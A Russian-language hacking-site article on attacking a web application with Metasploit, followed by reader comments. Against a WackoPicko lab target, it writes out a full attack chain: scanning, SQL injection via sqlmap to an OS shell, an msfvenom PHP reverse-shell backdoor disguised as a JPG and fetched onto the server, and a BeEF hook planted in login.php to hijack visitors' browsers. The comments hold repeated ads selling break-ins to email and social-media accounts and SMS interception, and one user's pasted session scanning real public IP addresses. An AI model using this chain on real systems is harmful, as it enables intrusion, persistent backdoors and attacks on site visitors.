Нажмите CTRL-D чтобы добавить нас в закладки
Внимание! Вы находитесь в незащищенном режиме (HTTP). Для перехода в защищенный режим SSL, нажмите здесь
HackZone.RU - Взлом сайтов с помощью Metasploit Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Взлом сайтов с помощью Metasploit

21.01.2014

Обычно пентестер или хакер используют Metasploit для эксплуатации уязвимостей  целевого сервера или для создания полезной нагрузки, чтобы загрузить бэкдор на взломанный сервер. Но Metastploit стал эффективнее с появлением плагинов и модулей, и теперь он может сделать значительно больше. А именно, он может быть использован для пентеста веб-приложений.

В этой статье я хочу показать вам, как использовать Metasploit для сканирования веб-приложений, получения информации о них и оценки уязвимостей.

Сценарий

Сейчас мы постараемся атаковать клиента, который использует уязвимый сервер. В качестве уязвимого сервера используется одно из веб-приложений OWASP Broken Web Application WackoPicko. Проект OWASP Broken Web Application представляет собой сборку уязвимых Web-приложений, предназначенных для обучения навыкам пентеста.

1. Машина атакующего - Backtrack 5 R3 192.168.1.137
2. Цель - веб-приложение WackoPicko 192.168.1.138



Этапы сканирования

Первым делом, когда Вы хотите взломать сервер, Вы должны получить как можно больше информации о цели. Поэтому первое, что Вы должны сделать, это просканировать сервер.

Metasploit имеет модуль "db_nmap", который используется для запуска Nmap (самый известный инструмент сканирования). Когда он получает результаты с Nmap, он заносит их в базу данных, специально для этого созданную. Следуйте этим инструкциям:

1. Откройте консоль Metasploit

root@bt:/ msfconsole

2. В консоли Metasploit введите команду db_nmap с IP-адресом целевой машины.

msf> db_nmap





msf > db_nmap 192.168.77.138



3. Вы можете проверить результаты сканирования командой "hosts".

msf > hosts -h



msf> hosts



4. Вы можете использовать команду «services» для получения деталей служб. Она имеет для отображения столбцы "создано, информация, имя, порт, протокол, состояние, обновлено".

msf > services -h



msf > services



msf> services -c port,name,state



Результат сверху показывает, какие веб-службы запущены на целевом сервере. Metasploit также имеет модуль для сканирования веб-сайта.

1. Возьмите модуль auxiliary/scanner/http/crawler.

msf> use auxiliary/scanner/http/crawler





2. Указываем цель параметром RHOST

msf auxiliary(crawler) > set RHOST 192.168.77.138



В этой статье мы фокусируемся на веб-приложении WackoPicko и зададим ему URI

msf auxiliary(crawler) > set URI /WackoPicko/



3. Начинаем сканирование веб-сайта

msf auxiliary(crawler) > run



На этом этапе Вы можете получить информацию о сервере и веб-приложении. На следующем этапе мы будем использовать эту информацию для атаки.



Этап эксплойта

На этом этапе мы попробуем атаку с модулем сканирования уязвимостей Metasploit и попытаемся использовать его с другим инструментом атаки.

Плагин WMAP

"WMAP является универсальным фреймворком сканирования веб-приложений для Metasploit 3. Его архитектура проста и ее простота - то, что делает его мощным. WMAP содержит другой подход по сравнению с остальными open source альтернативами и коммерческими сканерами, поскольку WMAP не сборка какого-либо браузера или паук для сбора и обработки данных".
Мы будем использовать этот модуль для сканирования уязвимостей веб-сайта.

1. Загрузка WMAP модулей

msf auxiliary(crawler) > load wmap



2. На предыдущем этапе мы уже сканировали веб-приложение и храним всю информацию в базе данных. WMAP плагин может прочитать ее, чтобы узнать структуру веб-приложения. И вы можете отобразить детали веб-приложения командой wmap_sites.

msf auxiliary(crawler) > wmap_sites



msf auxiliary(crawler) > wmap_sites -l



3. Если вы хотите увидеть структуру веб-приложения, вы можете использовать команду wmap_sites.

wmap_sites -s [target_id]

msf auxiliary(crawler) > wmap_sites -s 0



4. Теперь мы готовы к сканированию, поэтому мы будем определять цель веб-приложения командой wmap_targets.

msf auxiliary(crawler) > wmap_targets



msf auxiliary(crawler) > wmap_targets -t



5. Запускаем автоматический поиск уязвимостей командой wmap_run.

msf auxiliary(crawler) > wmap_run



msf auxiliary(crawler) > wmap_run -e




6. После окончания сканирования, Вы можете проверить результат командой wmap_vulns .

msf auxiliary(crawler)> wmap_vulns -l



Из результата мы узнаем некоторые уязвимости этого веб-приложения, такие как "уязвимый файл или каталог", "каталог администратора", "каталог резервных копий", "страница с уязвимостью SQL Injection" и т. д. Теперь вы можете попробовать атаковать исходя из этих результатов.



SQL-инъекция с помощью Metasploit

Если Вы хотите проверить, подвержен ли какой-либо параметр SQL-инъекции или нет, то Вы можете попробовать проверить его с помощью Metasploit. Для этого мы будем использовать модуль auxiliary/scanner/http/blind_sql_query.

1. После сканирования плагином WMAP, мы знаем, что страница http://192.168.77.138/WackoPicko/users/login.php имеет уязвимость SQL Injection и она имеет 2 параметра: username, password. Сейчас мы попытаемся проверить параметр username с помощью модуля auxiliary/scanner/http/blind_sql_query.

msf > use auxiliary/scanner/http/blind_sql_query
msf auxiliary(blind_sql_query) > show options



2. Указываем данные целевой страницы.

msf auxiliary(blind_sql_query) > set DATA username=hacker&password=password&submit=login
msf auxiliary(blind_sql_query) > set METHOD POST
msf auxiliary(blind_sql_query) > set PATH /WackoPicko/users/login.php
msf auxiliary(blind_sql_query) > set RHOSTS 192.168.77.138



3. Запускаем тестирование.

msf auxiliary(blind_sql_query) > run



Результат: параметр "username" имеет уязвимость SQL Injection. Вы можете проверить другую технику SQL инъекций [Error Based Technique] с помощью модуля auxiliary/scanner/http/error_sql_injection.

Теперь мы знаем параметр "username" страницы users/login.php, имеющий уязвимость, и мы используем эту уязвимость для завладения веб-сайтом с помощью sqlmap. SQLMap - известный инструмент для SQL-инъекций, прекрасно работающий с Metasploit.

1. Мы будем использовать 3 опции sqlmap для этой атаки.

    -u URL     url цели
    -data=DATA Строка данных, отправляемая через POST-запрос
    -random-agent Использование случайно выбранных HTTP User-Agent заголовков
    -os-shell Вызов интерактивной оболочки операционной системы

2.    Теперь запустим sqlmap с деталями, которые у нас имеются. После этой команды, если пользователь, использующий данное приложение (веб-сайт), имеет достаточно привилегий, мы сможем получить шелл. (ниже - вывод из процесса SQLMap для загрузки шелла.)

    root@bt:/pentest/database/sqlmap# ./sqlmap.py -u
    "http://192.168.77.138/WackoPicko/users/login.php" --data
    "username=hacker&password=password&submit=login" --os-shell



При появлении:
'http://192.168.77.138:80/WackoPicko/users/home.php'. Do you want to follow?
Выбираем:
[Y/n] Y



Сейчас мы находимся в целевой машине и создадим бэкдор для легкого бэкконнекта и легкой компрометации этой машины.

3. Мы создадим бэкдор с помощью Metasploit (команда msfvenom).

root@bt:~# msfvenom
no options
Usage: /opt/metasploit/msf3/msfvenom [options] <var=val>

Опции:



root@bt:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.77.137
LPORT=443 -f raw > /var/www/bd.php
root@bt:~# mv /var/www/bd.php /var/www/bd.jpg

4. В оболочке целевой машины скачайте бэкдор и измените его имя на bd.php.

os-shell> wget http://192.168.77.137/bd.jpg



5. Создайте обработчик для ожидания обратного соединения из bd.php.

root@bt:~# msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp
LHOST=192.168.77.137 LPORT=443 E




6. Запустим бэкдор в веб-браузере. А теперь мы получили Meterpreter в нашей Metasploit консоли



Сейчас мы завладели компьютером и можем делать все, что хотим с помощью Metasploit. В дальнейшем мы будем использовать BeEF для компрометации жертв, которые посетят веб-сайт на этой машине.



Metasploit с BeEF плагином

И последним в этой статье мы будем использовать Metasploit с BeEF (Browser Exploit Framework).

1. Запускаем службу beef
root@bt:/pentest/web/beef# ./beef -x -v

2. Переходим к директории плагинов Metasploit и загружаем BeEF из “https://github.com/xntrik/beefmetasploitplugin.git”

$ cd /pentest/exploits/framework/msf3
$ git clone https://github.com/xntrik/beefmetasploitplugin.git



3. Перемещаем файл beef.rb в msf/plugins и lib/beef в msf/lib
$root@bt:/pentest/exploits/framework/msf3# mv beefmetasploitplugin/lib/beef lib/
$root@bt:/pentest/exploits/framework/msf3# mv beefmetasploitplugin/plugins/beef.rb plugins/

4. Устанавливаем hpricot,json gem
$ root@bt:/pentest/exploits/framework/msf3# gem install hpricot json

5. В Metasploit консоли загружаем BeEF плагин.
msf> load beef



6. Подключаемся к BeEF
msf> beef_connect
msf > beef_connect http://127.0.0.1:3000 beef beef



7. На этом шаге мы хотим запустить скрипт BeEF на любом клиенте, который посетит страницу входа. Возвращаемся к шеллу Meterpreter, который мы получили на последнем этапе атаки sqlmap. Скачиваем страницу login.php. Добавляем скрипт в файл и загружаем его на хост-машину.

meterpreter > download login.php .



root@bt:~# echo "[путь к скрипту через теги <script>]" >> login.php



meterpreter > upload login.php

Теперь при посещении жертвой страницы авторизации запустится скрипт BeEF.

8. Перейдем к веб-интерфейсу управления BeEF (http://127.0.0.1:3000/ui/panel), войдя с именем “beef” и паролем “beef”.




9. Если кто-нибудь посетит страницу login.php, то будет атакован BeEF и в левой панели отобразится список жертв.



Для просмотра подробностей о жертве кликните по списку и они появятся в правой панели.



Также мы можем проверить список жертв из консоли Metasploit командой beef_online.

msf > beef online



Если Вы хотите проверить подробности о жертве в консоли Metasploit, используйте команду beef_target.

msf > beef_target



msf > beef_target -i 0



10. Сейчас можно запустить BeEF с командой beef_target

msf > beef_target -c 0 47



После запуска команды beef_target в BeEF консоли, BeEF может использовать команду "Человек-в-браузере" для жертвы.





Заключение

Теперь вы знаете, что Metasploit можно использовать для пентеста веб-сайтов, хотя и ограниченно. Им нельзя проверить веб-приложения на все типы уязвимостей, но он расширяем за счет других инструментов. Например, проверить сайт на наличие XSS (Cross-Site Scripting) можно, используя связку Metasploit + BeEF. Metasploit он не может проверить наличие уязвимости Remote File Inclusion, но он может создать бэкдор для этого. В будущем, возможно, Metasploit сможет тестировать их все. Если вы хотите научиться атаковать компьютеры, Metasploit будет отличным выбором для изучения всех векторов атак на компьютер.



Переведено специально для портала HackZone.RU
INVESTIGATOR+

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Взлом
Опубликовал: INVESTIGATOR+
Просмотров: 147989
Проголосовало через SMS: 0
Ключевые слова: metasploit, (найти похожие документы)
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
Просто без слов...
Молок чувак!=)
08.03.2014 / RASTHISHKA
Один из самых полезных статей что я читал последнее время.
Красавчик бро!!!
Только объясни момент один, где ты взял вот эти данные username=hacker&password=password&submit=login
???
24.06.2014 / Assassinpro
привет
команда
msf auxiliary(crawler) > wmap_run -e
ну ооооочень долго сканирует. это нормально?
16.01.2015 / people.xtr
PS: А статья действительно занятная, автору огромное спасибо! Потрудисля)Beerchug
21.10.2015 / undrru
Когда пишу db_nmap  пишет db_nmap: not found
 
04.11.2015 / WhoIsIt?
Спасибо. Очень интересно, будем учиться.
20.12.2015 / zckp11
Взлом паролей на почтовых сервисах
и соц сетях.
Распечатка СМС,WhatsApp,Viber.
Оплата по факту!
Гарантия 100%.
 
mail_crack@rocketmail.com
25.07.2016 / Ujarj
ПРЕДОСТАВЛЕНИЕ УСЛУГ ПО ВЗЛОМУ:
 
**1 Взлом СОЦИАЛЬНЫЕ СЕТИ:
1.1 Взлом В контакте (vkontakte.ru)
1.2 Взлом Одноклассники (odnoklassniki.ru)
1.3 Взлом Фейсбук (Facebook)
1.4 Взлом Twitter
1.5 Взлом Instagram
1.6 Взлом Мой мир
1.7 Взлом Ask
1.8 Взлом Google +
 
**2 Взлом ПОЧТЫ:
2.1 Взлом mail.ru
2.2 Взлом yandex.ru
2.3 Взлом rambler.ru
2.4 Взлом gmail.com
2.5 Взлом ukr.net
2.6 Взлом yahoo.com
2.7 Взлом hotmail.com
2.8 Взлом qip-pochta
2.9 Взлом mamba.ru
---корпоративные почты т.е. Корпоративный портал интегрирует внутренние приложения,
 такие как приложения электронной почты, доступа к базе данных и управления документами,
 с внешними приложениями.
 
**3 распечатка смс и звонков мобильных операторов
 
**4 Взлом Сайты знакомств рассмотрим любой хостинг  
 
**5 Взлом Icq, qip
 
**6 Очистка кредитной истории
 
**7 Взлом друг вокруг, Viber, WhatsApp
 
ОБЯЗУЕМСЯ:
- Крайне высокая вероятность взлома - 93%
- Пароли не меняем
- "жертва"  будет продолжать пользоваться анкетой, ничего не подозревая
- Кратчайшие сроки выполнения заказа
- Анонимность и конфиденциальность полностью соблюдается
- Простейшая и удобная система оплаты: яндекс деньги, webmoney, киви или просто на мобильный телефон которые можно оплатить в любом платёжном терминале
- Постоянным клиентам - солидные скидки
 
ОБРАЩАТЬСЯ:
*ICQ: 445-499-877
*Почта: proger.pomosh@gmail.com
*Вконтакте: vk.com/proger.pomosh
-
 
-
-
-
-
-
-
 
-
-
-
-
-
-
 
-
-
-
-
-
-
ПРЕДОСТАВЛЕНИЕ УСЛУГ ПО ВЗЛОМУ:
 
**1 Взлом СОЦИАЛЬНЫЕ СЕТИ:
1.1 Взлом В контакте (vkontakte.ru)
1.2 Взлом Одноклассники (odnoklassniki.ru)
1.3 Взлом Фейсбук (Facebook)
1.4 Взлом Twitter
1.5 Взлом Instagram
1.6 Взлом Мой мир
1.7 Взлом Ask
1.8 Взлом Google +
 
**2 Взлом ПОЧТЫ:
2.1 Взлом mail.ru
2.2 Взлом yandex.ru
2.3 Взлом rambler.ru
2.4 Взлом gmail.com
2.5 Взлом ukr.net
2.6 Взлом yahoo.com
2.7 Взлом hotmail.com
2.8 Взлом qip-pochta
2.9 Взлом mamba.ru
---корпоративные почты т.е. Корпоративный портал интегрирует внутренние приложения,
 такие как приложения электронной почты, доступа к базе данных и управления документами,
 с внешними приложениями.
 
**3 распечатка смс и звонков мобильных операторов
 
**4 Взлом Сайты знакомств рассмотрим любой хостинг  
 
**5 Взлом Icq, qip
 
**6 Очистка кредитной истории
 
**7 Взлом друг вокруг, Viber, WhatsApp
 
ОБЯЗУЕМСЯ:
- Крайне высокая вероятность взлома - 93%
- Пароли не меняем
- "жертва"  будет продолжать пользоваться анкетой, ничего не подозревая
- Кратчайшие сроки выполнения заказа
- Анонимность и конфиденциальность полностью соблюдается
- Простейшая и удобная система оплаты: яндекс деньги, webmoney, киви или просто на мобильный телефон которые можно оплатить в любом платёжном терминале
- Постоянным клиентам - солидные скидки
 
ОБРАЩАТЬСЯ:
*ICQ: 445-499-877
*Почта: proger.pomosh@gmail.com
*Вконтакте: vk.com/proger.pomosh
04.12.2016 / proger309
Услуги взлома на заказ!
http://помощьвам.рус
world-hack-pro@mail.ru
Whats App: +79672315804
Viber: +79670252050
Ждем вас!
05.12.2016 / world-hack-pro
msf > db_nmap 82.208.100.243
[*] Nmap: Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-01-16 19:03 MSK
[*] Nmap: Nmap scan report for 82-208-100-243.pg-nat-pool.mts-nn.ru (82.208.100.243)
[*] Nmap: Host is up (0.035s latency).
[*] Nmap: Not shown: 994 filtered ports
[*] Nmap: PORT    STATE SERVICE
[*] Nmap: 25/tcp  open  smtp
[*] Nmap: 110/tcp open  pop3
[*] Nmap: 143/tcp open  imap
[*] Nmap: 587/tcp open  submission
[*] Nmap: 993/tcp open  imaps
[*] Nmap: 995/tcp open  pop3s
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 49.86 seconds
msf > hosts -h
Usage: hosts [ options ] [addr1 addr2 ...]
 
OPTIONS:
  -a,--add          Add the hosts instead of searching
  -d,--delete       Delete the hosts instead of searching
  -c <col1,col2>    Only show the given columns (see list below)
  -h,--help         Show this help information
  -u,--up           Only show hosts which are up
  -o <file>         Send output to a file in csv format
  -R,--rhosts       Set RHOSTS from the results of the search
  -S,--search       Search string to filter by
  -i,--info         Change the info of a host
  -n,--name         Change the name of a host
  -m,--comment      Change the comment of a host
  -t,--tag          Add or specify a tag to a range of hosts
 
Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags
 
msf > hosts
 
Hosts
=====
 
address         mac  name                                  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---  ----                                  -------  ---------  -----  -------  ----  --------
82.208.100.243       82-208-100-243.pg-nat-pool.mts-nn.ru  Unknown                    device        
85.140.7.139         ppp85-140-7-139.pppoe.mtu-net.ru      Unknown                    device        
85.140.7.255         85.140.7.255                          Unknown                    device        
93.120.214.97        93-120-214-97.dynamic.mts-nn.ru       Unknown                    device        
178.93.1.3           3-1-93-178.pool.ukrtel.net            Unknown                    device        
188.162.245.9        client.yota.ru                        Unknown                    device        
192.168.77.138       192.168.77.138                        Unknown                    device        
 
msf > services -h
 
Usage: services [-h] [-u] [-a] [-r <proto>] [-p <port1,port2>] [-s <name1,name2>] [-o <filename>] [addr1 addr2 ...]
 
  -a,--add          Add the services instead of searching
  -d,--delete       Delete the services instead of searching
  -c <col1,col2>    Only show the given columns
  -h,--help         Show this help information
  -s <name1,name2>  Search for a list of service names
  -p <port1,port2>  Search for a list of ports
  -r <protocol>     Only show [tcp|udp] services
  -u,--up           Only show services which are up
  -o <file>         Send output to a file in csv format
  -R,--rhosts       Set RHOSTS from the results of the search
  -S,--search       Search string to filter by
 
Available columns: created_at, info, name, port, proto, state, updated_at
 
msf > services
 
Services
========
 
host            port  proto  name          state     info
----            ----  -----  ----          -----     ----
82.208.100.243  25    tcp    smtp          open      
82.208.100.243  110   tcp    pop3          open      
82.208.100.243  143   tcp    imap          open      
82.208.100.243  587   tcp    submission    open      
82.208.100.243  993   tcp    imaps         open      
82.208.100.243  995   tcp    pop3s         open      
85.140.7.139    25    tcp    smtp          open      
85.140.7.139    80    tcp    http          open      
85.140.7.139    110   tcp    pop3          open      
85.140.7.139    119   tcp    nntp          open      
85.140.7.139    143   tcp    imap          open      
85.140.7.139    465   tcp    smtps         open      
85.140.7.139    563   tcp    snews         open      
85.140.7.139    587   tcp    submission    open      
85.140.7.139    993   tcp    imaps         open      
85.140.7.139    995   tcp    pop3s         open      
85.140.7.255    80    tcp    http          open      
93.120.214.97   21    tcp    ftp           open      
93.120.214.97   22    tcp    ssh           open      
93.120.214.97   23    tcp    telnet        open      
93.120.214.97   25    tcp    smtp          open      
93.120.214.97   80    tcp    http          open      
93.120.214.97   110   tcp    pop3          open      
93.120.214.97   119   tcp    nntp          open      
93.120.214.97   139   tcp    netbios-ssn   open      
93.120.214.97   143   tcp    imap          open      
93.120.214.97   445   tcp    microsoft-ds  open      
93.120.214.97   465   tcp    smtps         open      
93.120.214.97   514   tcp    shell         filtered  
93.120.214.97   563   tcp    snews         open      
93.120.214.97   587   tcp    submission    open      
93.120.214.97   993   tcp    imaps         open      
93.120.214.97   995   tcp    pop3s         open      
93.120.214.97   5431  tcp    park-agent    open      
178.93.1.3      25    tcp    smtp          open      
178.93.1.3      110   tcp    pop3          open      
178.93.1.3      119   tcp    nntp          open      
178.93.1.3      143   tcp    imap          open      
178.93.1.3      465   tcp    smtps         open      
178.93.1.3      563   tcp    snews         open      
178.93.1.3      587   tcp    submission    open      
178.93.1.3      993   tcp    imaps         open      
178.93.1.3      995   tcp    pop3s         open      
188.162.245.9   25    tcp    smtp          open      
188.162.245.9   80    tcp    http          open      
188.162.245.9   110   tcp    pop3          open      
188.162.245.9   119   tcp    nntp          open      
188.162.245.9   143   tcp    imap          open      
188.162.245.9   465   tcp    smtps         open      
188.162.245.9   563   tcp    snews         open      
188.162.245.9   587   tcp    submission    open      
188.162.245.9   993   tcp    imaps         open      
188.162.245.9   995   tcp    pop3s         open      
192.168.77.138  25    tcp    smtp          open      
192.168.77.138  80    tcp    http          open      
192.168.77.138  110   tcp    pop3          open      
192.168.77.138  143   tcp    imap          open      
192.168.77.138  587   tcp    submission    open      
192.168.77.138  993   tcp    imaps         open      
192.168.77.138  995   tcp    pop3s         open      
 
msf > services -c port,name,state
 
Services
========
 
host            port  name          state
----            ----  ----          -----
82.208.100.243  25    smtp          open
82.208.100.243  110   pop3          open
82.208.100.243  143   imap          open
82.208.100.243  587   submission    open
82.208.100.243  993   imaps         open
82.208.100.243  995   pop3s         open
85.140.7.139    25    smtp          open
85.140.7.139    80    http          open
85.140.7.139    110   pop3          open
85.140.7.139    119   nntp          open
85.140.7.139    143   imap          open
85.140.7.139    465   smtps         open
85.140.7.139    563   snews         open
85.140.7.139    587   submission    open
85.140.7.139    993   imaps         open
85.140.7.139    995   pop3s         open
85.140.7.255    80    http          open
93.120.214.97   21    ftp           open
93.120.214.97   22    ssh           open
93.120.214.97   23    telnet        open
93.120.214.97   25    smtp          open
93.120.214.97   80    http          open
93.120.214.97   110   pop3          open
93.120.214.97   119   nntp          open
93.120.214.97   139   netbios-ssn   open
93.120.214.97   143   imap          open
93.120.214.97   445   microsoft-ds  open
93.120.214.97   465   smtps         open
93.120.214.97   514   shell         filtered
93.120.214.97   563   snews         open
93.120.214.97   587   submission    open
93.120.214.97   993   imaps         open
93.120.214.97   995   pop3s         open
93.120.214.97   5431  park-agent    open
178.93.1.3      25    smtp          open
178.93.1.3      110   pop3          open
178.93.1.3      119   nntp          open
178.93.1.3      143   imap          open
178.93.1.3      465   smtps         open
178.93.1.3      563   snews         open
178.93.1.3      587   submission    open
178.93.1.3      993   imaps         open
178.93.1.3      995   pop3s         open
188.162.245.9   25    smtp          open
188.162.245.9   80    http          open
188.162.245.9   110   pop3          open
188.162.245.9   119   nntp          open
188.162.245.9   143   imap          open
188.162.245.9   465   smtps         open
188.162.245.9   563   snews         open
188.162.245.9   587   submission    open
188.162.245.9   993   imaps         open
188.162.245.9   995   pop3s         open
192.168.77.138  25    smtp          open
192.168.77.138  80    http          open
192.168.77.138  110   pop3          open
192.168.77.138  143   imap          open
192.168.77.138  587   submission    open
192.168.77.138  993   imaps         open
192.168.77.138  995   pop3s         open
 
msf > use auxiliary/scanner/http/crawler
msf auxiliary(crawler) > show options
 
Module options (auxiliary/scanner/http/crawler):
 
   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DOMAIN        WORKSTATION      yes       The domain to use for windows authentication
   HttpPassword                   no        The HTTP password to specify for authentication
   HttpUsername                   no        The HTTP username to specify for authentication
   MAX_MINUTES   5                yes       The maximum number of minutes to spend on each URL
   MAX_PAGES     500              yes       The maximum number of pages to crawl per URL
   MAX_THREADS   4                yes       The maximum number of concurrent requests
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                          yes       The target address
   RPORT         80               yes       The target port
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   URI           /                yes       The starting page to crawl
   VHOST                          no        HTTP server virtual host
 
msf auxiliary(crawler) > set RHOST 82.208.100.243
RHOST => 82.208.100.243
msf auxiliary(crawler) > set URI /WackoPicko/
URI => /WackoPicko/
msf auxiliary(crawler) > run
 
[*] Crawling http://82.208.100.243:80/WackoPicko/...
[-] [00001/00500]    ERR - 82.208.100.243 - http://82.208.100.243/WackoPicko/
[*] Crawl of http://82.208.100.243:80/WackoPicko/ complete
[*] Auxiliary module execution completed
msf auxiliary(crawler) > load wmap
 
.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
msf auxiliary(crawler) > wmap_sites
[*] Usage: wmap_sites [options]
-h        Display this help text
-a   Add site (vhost,url)
-d [ids]  Delete sites (separate ids with space)
-l        List all available sites
-s [id]   Display site structure (vhost,url|ids) (level)
 
msf auxiliary(crawler) > wmap_sites -l
[*] Available sites
===============
 
     Id  Host            Vhost           Port  Proto  # Pages  # Forms
     --  ----            -----           ----  -----  -------  -------
     0   82.208.100.243  82.208.100.243  80    http   1        0
     1   85.140.7.139    85.140.7.139    80    http   1        0
     2   85.140.7.255    85.140.7.255    80    http   1        0
     3   188.162.245.9   188.162.245.9   80    http   1        0
     4   192.168.77.138  192.168.77.138  80    http   1        0
 

msf auxiliary(crawler) > wmap_sites -s 0
    [82.208.100.243] (82.208.100.243)
          
          |-----/WackoPicko
 

msf auxiliary(crawler) > wmap_targets
[*] Usage: wmap_targets [options]
-h Display this help text
-t [urls] Define target sites (vhost1,url[space]vhost2,url)
-d [ids] Define target sites (id1, id2, id3 ...)
-c Clean target sites list
-l   List all target sites
 
msf auxiliary(crawler) > wmap_targets -t
msf auxiliary(crawler) > wmap_run
[*] Usage: wmap_run [options]
-h                        Display this help text
-t                        Show all enabled modules
-m [regex]                Launch only modules that name match provided regex.
-p [regex]                Only test path defined by regex.
-e [/path/to/profile]     Launch profile modules against all matched targets.
                          (No profile file runs all enabled modules.)
 
msf auxiliary(crawler) > wmap_run -e
[*] Using ALL wmap enabled modules.
[-] NO WMAP NODES DEFINED. Executing local modules
[-] Targets have not been selected.
msf auxiliary(crawler) >
16.01.2017 / poteh799
в чем ошибка и как тут что делать обьсните?
16.01.2017 / poteh799
Взлом и подбор паролей на почтовых сервисах
и социальных сетях.
 
Работаем со всеми бесплатными почтовыми сервисами,
а так же cо всеми соц. сетями, сайтами знакомств,
блогами, ICQ, твиттер, а так же
РАСПЕЧАТКА СМС,WHATSAPP,VIBER
ДЕТАЛИЗАЦИЯ ЗВОНКОВ (NEW).
 
Профессионально
Конфиденциально.
Оплата по факту выполнения заказа.
Оперативные сроки.
Индивидуальные цены от 500р.
 
mail_crack@rocketmail.com
Круглосуточно.
 
 
 
 
-
-
-
 
 
 
Взлом и подбор паролей на почтовых сервисах
и социальных сетях.
 
Работаем со всеми бесплатными почтовыми сервисами,
а так же cо всеми соц. сетями, сайтами знакомств,
блогами, ICQ, твиттер, а так же
РАСПЕЧАТКА СМС,WHATSAPP,VIBER
ДЕТАЛИЗАЦИЯ ЗВОНКОВ (NEW).
 
Профессионально
Конфиденциально.
Оплата по факту выполнения заказа.
Оперативные сроки.
Индивидуальные цены от 500р.
 
mail_crack@rocketmail.com
Круглосуточно.
17.01.2017 / Ujarj
ПРЕДОСТАВЛЕНИЕ УСЛУГ ПО ВЗЛОМУ:
 
**1 Взлом СОЦИАЛЬНЫЕ СЕТИ:
1.1 Взлом В контакте (vkontakte.ru)
1.2 Взлом Одноклассники (odnoklassniki.ru)
1.3 Взлом Фейсбук (Facebook)
1.4 Взлом Twitter
1.5 Взлом Instagram
1.6 Взлом Мой мир
1.7 Взлом Ask
1.8 Взлом Google +
 
**2 Взлом ПОЧТЫ:
2.1 Взлом mail.ru
2.2 Взлом yandex.ru
2.3 Взлом rambler.ru
2.4 Взлом gmail.com
2.5 Взлом ukr.net
2.6 Взлом yahoo.com
2.7 Взлом hotmail.com
2.8 Взлом qip-pochta
2.9 Взлом mamba.ru
---корпоративные почты т.е. Корпоративный портал интегрирует внутренние приложения,
 такие как приложения электронной почты, доступа к базе данных и управления документами,
 с внешними приложениями.
 
**3 распечатка смс и звонков мобильных операторов
 
**4 Взлом Сайты знакомств рассмотрим любой хостинг  
 
**5 Взлом Icq, qip
 
**6 Очистка кредитной истории
 
**7 Взлом друг вокруг, Viber, WhatsApp
 
ОБЯЗУЕМСЯ:
- Крайне высокая вероятность взлома - 93%
- Пароли не меняем
- "жертва"  будет продолжать пользоваться анкетой, ничего не подозревая
- Кратчайшие сроки выполнения заказа
- Анонимность и конфиденциальность полностью соблюдается
- Простейшая и удобная система оплаты: яндекс деньги, webmoney, киви или просто на мобильный телефон которые можно оплатить в любом платёжном терминале
- Постоянным клиентам - солидные скидки
 
ОБРАЩАТЬСЯ:
*ICQ: 445-499-877
*Почта: proger.pomosh@gmail.com
*Вконтакте: vk.com/proger.pomosh
-
 
-
-
-
-
-
-
 
-
-
-
-
-
-
 
-
-
-
-
-
-
ПРЕДОСТАВЛЕНИЕ УСЛУГ ПО ВЗЛОМУ:
 
**1 Взлом СОЦИАЛЬНЫЕ СЕТИ:
1.1 Взлом В контакте (vkontakte.ru)
1.2 Взлом Одноклассники (odnoklassniki.ru)
1.3 Взлом Фейсбук (Facebook)
1.4 Взлом Twitter
1.5 Взлом Instagram
1.6 Взлом Мой мир
1.7 Взлом Ask
1.8 Взлом Google +
 
**2 Взлом ПОЧТЫ:
2.1 Взлом mail.ru
2.2 Взлом yandex.ru
2.3 Взлом rambler.ru
2.4 Взлом gmail.com
2.5 Взлом ukr.net
2.6 Взлом yahoo.com
2.7 Взлом hotmail.com
2.8 Взлом qip-pochta
2.9 Взлом mamba.ru
---корпоративные почты т.е. Корпоративный портал интегрирует внутренние приложения,
 такие как приложения электронной почты, доступа к базе данных и управления документами,
 с внешними приложениями.
 
**3 распечатка смс и звонков мобильных операторов
 
**4 Взлом Сайты знакомств рассмотрим любой хостинг  
 
**5 Взлом Icq, qip
 
**6 Очистка кредитной истории
 
**7 Взлом друг вокруг, Viber, WhatsApp
 
ОБЯЗУЕМСЯ:
- Крайне высокая вероятность взлома - 93%
- Пароли не меняем
- "жертва"  будет продолжать пользоваться анкетой, ничего не подозревая
- Кратчайшие сроки выполнения заказа
- Анонимность и конфиденциальность полностью соблюдается
- Простейшая и удобная система оплаты: яндекс деньги, webmoney, киви или просто на мобильный телефон которые можно оплатить в любом платёжном терминале
- Постоянным клиентам - солидные скидки
 
ОБРАЩАТЬСЯ:
*ICQ: 445-499-877
*Почта: proger.pomosh@gmail.com
*Вконтакте: vk.com/proger.pomosh
12.03.2017 / misha.pro311
Профессиональные услуги взлома:
1.Взлом социальных сетей, работаем с зарубежными сетями.
- взлом вконтакте, взлом vk
- взлом facebook
- взлом ok, взлом одноклассники
- взлом мамба
- взлом loveplanet
И любых других социальных сетей.
2. Взлом почты, взлом корпоративной почты, взлом зарубежной почты.
- yahoo.com  
- live.com  
- mail.com  
- aol.com  
- hotmail.com
- mail.ru  
- yandex.ru  
- bk.ru
- rambler.ru и пр.
- Любая коропоративная или экзотическая почта будет вскрыта...
3. Взлом Skype и любой другой телефонии.
4.- Взлом viber
  - whatsapp и любых других приложений.
5.Взлом сайтов и web проектов любой сложности и тематики
- Форумы
- Бизнес сайты
- Сайты визитки
